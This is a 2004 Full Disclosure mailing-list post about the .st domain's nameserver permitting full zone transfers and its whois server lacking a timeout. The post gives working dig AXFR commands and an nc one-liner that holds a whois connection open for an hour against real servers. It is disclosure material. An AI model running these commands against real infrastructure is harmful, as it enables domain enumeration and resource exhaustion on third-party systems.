Home page logo

fulldisclosure logo Full Disclosure mailing list archives

Re: zone transfers, a spammer's dream?
From: "Troubles Troubles" <troubles___ () hotmail com>
Date: Mon, 20 Dec 2004 00:40:52 +0000

== the fucking bugtraq moderators don't let me post this! ==

.st has this bug too. you can transfer the whole domain. their whois server also doesn't have any time-out!

try this:

dig @a.root-servers.net. st. ns
dig @auth61.ns.uu.net. st. axfr
(sleep 3600; perl -e 'print "karlung-liberation-front.st\015\012";') | nc whois.nic.st. 43

found by

Lättare att hitta drömresan med MSN Resor http://www.msn.se/resor/

Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]